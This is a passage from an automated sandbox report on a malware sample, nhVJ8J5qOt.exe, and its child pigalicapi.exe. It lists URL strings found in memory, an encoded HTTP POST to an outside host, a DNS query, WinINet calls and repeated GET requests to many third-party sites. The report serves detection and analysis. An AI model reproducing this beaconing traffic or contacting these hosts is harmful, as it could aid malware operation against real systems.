00000000.00000003.669959249.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.517249005.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.642131437.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.642925474.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stnic.co.uk/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.0000000001552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.transsib.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832259405.0000000007680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.yoruksut.com.tr
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 64 61 39 4c 31 79 5a 49 63 49 5a 71 2b 6e 4b 41 77 63 47 58 32 45 6c 77 72 5a 4d 47 47 63 34 41 75 74 36 69 6b 54 68 65 52 54 53 61 45 64 74 6c 61 35 66 67 54 71 37 31 33 75 7a 2f 30 78 6e 6e 65 49 30 55 4f 37 61 42 2b 67 48 39 49 2f 70 38 65 6b 43 57 58 72 34 44 6e 41 4d 44 78 58 42 41 4d 47 6f 76 37 49 70 6a 72 32 64 70 51 6d 37 54 5a 6f 6c 69 4b 31 30 43 2f 6f 6b 5a 43 64 47 67 47 39 53 71 44 33 53 78 2b 50 73 58 68 6c 52 72 70 49 71 74 77 31 65 2f 6f 38 69 69 4d 52 2b 43 67 61 77 46 74 47 75 47 2f 56 4c 44 73 6e 53 58 6e 63 64 66 67 6e 54 33 4a 49 32 50 56 53 78 44 5a 53 43 7a 59 59 54 74 50 53 51 32 34 6f 69 6d 74 73 46 50 41 71 30 63 63 6a 34 76 58 62 37 4a 78 45 6a 45 70 62 58 58 71 71 69 38 4f 76 44 78 56 38 71 58 4d 4c 7a 74 4a 44 39 4e 4f 63 70 6e 35 54 6e 4d 2b 6b 41 65 30 6c 56 39 51 2b 72 31 2f 74 66 4b 64 53 55 69 48 69 71 4d 4e 49 55 63 76 38 55 58 34 44 46 59 4d 42 64 4d 6c 46 53 79 4a 72 5a 51 78 6f 59 32 4e 36 59 31 39 6f 62 6f 55 57 46 70 78 66 77 74 4e 6f 43 6c 39 4c 6e 44 73 6a 79 47 76 50 5a 77 78 49 4a 6c 32 4a 6f 54 67 79 6d 5a 77 65 59 33 68 4b 49 79 52 6b 6f 30 30 58 50 35 44 42 75 74 58 56 54 69 49 53 68 36 77 2b 50 32 35 69 32 35 63 4e 37 47 73 59 4c 43 33 64 79 47 69 6e 45 4f 55 52 4b 50 62 4c 75 45 76 50 34 4a 63 31 44 78 39 61 4f 35 72 6f 4b 70 44 66 2f 75 37 6a 42 45 70 47 38 6f 70 44 67 4d 36 41 63 64 37 54 78 6e 54 6f 2f 6f 49 35 47 77 78 42 6b 31 39 6a 65 73 7a 52 68 6a 33 7a 78 32 37 53 46 32 4c 68 37 77 50 76 48 37 47 65 36 5a 78 6c 50 44 72 6c 33 4a 78 64 46 36 62 30 72 57 38 62 37 54 49 4e 57 78 71 4c 48 7a 33 65 5a 74 7a 58 58 50 57 65 30 43 49 45 46 41 30 37 71 51 34 36 6e 55 47 41 2b 48 6f 51 41 42 55 63 72 58 43 63 42 46 33 47 56 38 33 4b 4e 4e 54 77 4a 6d 34 34 6c 30 72 56 59 73 69 36 6f 75 4e 6d 5a 42 56 39 68 7a 2f 4e 59 3d Data Ascii: da9L1yZIcIZq+nKAwcGX2ElwrZMGGc4Aut6ikTheRTSaEdtla5fgTq713uz/0xnneI0UO7aB+gH9I/p8ekCWXr4DnAMDxXBAMGov7Ipjr2dpQm7TZoliK10C/okZCdGgG9SqD3Sx+PsXhlRrpIqtw1e/o8iiMR+CgawFtGuG/VLDsnSXncdfgnT3JI2PVSxDZSCzYYTtPSQ24oimtsFPAq0ccj4vXb7JxEjEpbXXqqi8OvDxV8qXMLztJD9NOcpn5TnM+kAe0lV9Q+r1/tfKdSUiHiqMNIUcv8UX4DFYMBdMlFSyJrZQxoY2N6Y19oboUWFpxfwtNoCl9LnDsjyGvPZwxIJl2JoTgymZweY3hKIyRko00XP5DButXVTiISh6w+P25i25cN7GsYLC3dyGinEOURKPbLuEvP4Jc1Dx9aO5roKpDf/u7jBEpG8opDgM6Acd7TxnTo/oI5GwxBk19jeszRhj3zx27SF2Lh7wPvH7Ge6ZxlPDrl3JxdF6b0rW8b7TINWxqLHz3eZtzXXPWe0CIEFA07qQ46nUGA+HoQABUcrXCcBF3GV83KNNTwJm44l0rVYsi6ouNmZBV9hz/NY=
                  Source: unknownDNS traffic detected: queries for: www.olras.com
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01171840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_01171840
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5448
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
